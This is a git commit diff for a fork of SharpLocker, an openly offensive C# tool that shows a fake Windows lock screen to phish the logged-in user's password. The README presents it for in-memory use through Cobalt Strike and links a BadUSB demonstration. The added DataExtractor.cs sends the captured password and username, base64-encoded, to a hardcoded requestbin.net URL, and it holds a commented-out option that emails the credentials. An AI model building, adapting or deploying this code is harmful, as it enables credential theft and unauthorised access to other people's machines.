Profile picture detection, background, username stuff and easier extraction

.gitattributes

@@ -17,7 +17,7 @@
 #
 # Merging from the command prompt will add diff markers to the files if there
 # are conflicts (Merging from VS is not affected by the settings below, in VS
-# the diff markers are never inserted). Diff markers may cause the following 
+# the diff markers are never inserted). Diff markers may cause the following
 # file extensions to fail to load in VS. An alternative would be to treat
 # these files as binary and thus will always conflict and require user
 # intervention with every merge. To do so, just uncomment the entries below
@@ -46,9 +46,9 @@
 
 ###############################################################################
 # diff behavior for common document formats
-# 
+#
 # Convert binary document formats to text before diffing them. This feature
-# is only available from the command line. Turn it on by uncommenting the 
+# is only available from the command line. Turn it on by uncommenting the
 # entries below.
 ###############################################################################
 #*.doc   diff=astextplain

README.md

@@ -1,22 +1,41 @@
 # SharpLocker
 
-SharpLocker helps get current user credentials by popping a fake Windows lock screen, all output is sent to Console which works perfect for Cobalt Strike. It is written in C# to allow for direct execution via memory injection using techniques such as execute-assembly found in Cobalt Strike or others, this method prevents the executable from ever touching disk. It is NOT intended to be compilled and run locally on a device. 
+SharpLocker helps get current user credentials by popping a fake Windows lock screen, the output can be send via email or requestbin.net. It is written in C# to allow for direct execution via memory injection using techniques such as execute-assembly found in Cobalt Strike or others, this method prevents the executable from ever touching disk. It is NOT intended to be compilled and run locally on a device.
 
-## What SharpLocker is
+# What SharpLocker is
 * A .NET application that is supposed to be run in memory on a target device
 
-## What SharpLocker is NOT
+# What SharpLocker is NOT
 * A password stealing tool that emails plain text credentials
 * An executable that is supposed to be double clicked
 
-## Works
+# Works
 * Single/Multiple Monitors
 * Windows 10
 * Main monitor needs to be 1080p otherwise the location of the elements are wrong
+* With any background and profile picture
 
-![Working SharpLocker](https://github.com/Pickfordmatt/SharpLocker/blob/master/sharplocker.png?raw=true)
+![Working SharpLocker](https://github.com/3top1a/SharpLocker/blob/master/SharpLocker_example.png)
 
-## How to
+# How to
 * Compile SharpLocker from source via VisualStudio etc
 * Within a Cobalt Strike implant run execute-assembly C:/{location of exe}
 * Pray and wait for creds
+
+# Credits
+* This project was originally built by Pickfordmatt.
+* This fork was rebuilded by 3top1a with more features.
+
+Thanks to:
+* keldnorman
+* Ascensao
+
+# This fork Vs Original Project (differences)
+* Background from spotlight
+* Major GUI upgrades
+* real username instead windows user folder name.
+* Password extraction
+* Code cleanup
+
+# BadUSB implementation example
+https://www.youtube.com/watch?v=JYi_H9n5xjw

SharpLocker/CustomPictureBox.cs

@@ -0,0 +1,33 @@
+using System;
+using System.Collections.Generic;
+using System.Drawing;
+using System.Drawing.Drawing2D;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+using System.Windows.Forms;
+
+namespace SharpLocker
+{
+    class CustomPictureBox : PictureBox
+    {
+        public CustomPictureBox()
+        {
+        }
+
+        public CustomPictureBox(Image image)
+        {
+            this.Image = image;
+        }
+
+        public InterpolationMode InterpolationMode { get; set; }
+        public SmoothingMode SmoothingMode { get; set; }
+
+        protected override void OnPaint(PaintEventArgs paintEventArgs)
+        {
+            paintEventArgs.Graphics.InterpolationMode = InterpolationMode;
+            paintEventArgs.Graphics.SmoothingMode = SmoothingMode;
+            base.OnPaint(paintEventArgs);
+        }
+    }
+}

SharpLocker/DataExtractor.cs

@@ -0,0 +1,79 @@
+using System;
+using System.Net;
+using System.Net.Mail;
+using System.Text;
+
+namespace SharpLocker
+{
+    public static class DataExtractor
+    {
+        public static void Extract(string password)
+        {
+            //Extract with request bin
+            ExtractWithRequastBin(password);
+
+            //Extract with email
+            //ExtractWithEmail(password);
+        }
+
+        static void ExtractWithRequastBin(string password)
+        {
+            //http://requestbin.net
+            //RequestBin is a service that allows you to inspect requests.
+            //We are going to use this to send a request with the password.
+            //Creds to Seytonic
+
+            //YOUR RequestBin link
+            //format: http://requestbin.net/r/xxxxxxxx
+            string url = "http://requestbin.net/r/rv6v9wrv";
+
+            bool EncodeWithBase64 = true;
+            bool IncludeUsername = true;
+
+            //Don't touch this!
+            string p = "";
+
+            if (IncludeUsername)
+            {
+                string userNameText = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
+                p = "Password:" + password + " Username:" + userNameText.Split('\\')[1];
+            }
+            else
+            {
+                p = password;
+            }
+
+            if (EncodeWithBase64)
+            {
+                var plainTextBytes = Encoding.UTF8.GetBytes(p);
+                p = Convert.ToBase64String(plainTextBytes);
+            }
+
+            HttpWebRequest req = (HttpWebRequest)WebRequest.Create(url + "?" + p);
+            req.GetResponse();
+
+        }
+
+        static void ExtractWithEmail(string password)
+        {
+            //This sends an email with the password and computer details.
+
+            string e_pass = ""; //Password for the email
+            string e_address = ""; //Address of the email
+            string e_host_addr = ""; //Address of the email provider
+            int e_host_port = 587; //Port for the email providers
+
+            //Don't touch this!
+            string body = "Password: " + password + " Username&Domain: " + System.Security.Principal.WindowsIdentity.GetCurrent().Name;
+
+            MailMessage msg = new MailMessage(e_address, e_address, "Windwos Password on " + System.Security.Principal.WindowsIdentity.GetCurrent().Name, body);
+            msg.IsBodyHtml = true;
+            SmtpClient sc = new SmtpClient(e_host_addr, e_host_port);
+            sc.UseDefaultCredentials = false;
+            NetworkCredential cre = new NetworkCredential(e_address, e_pass);//your mail password
+            sc.Credentials = cre;
+            sc.EnableSsl = true;
+            sc.Send(msg);
+        }
+    }
+}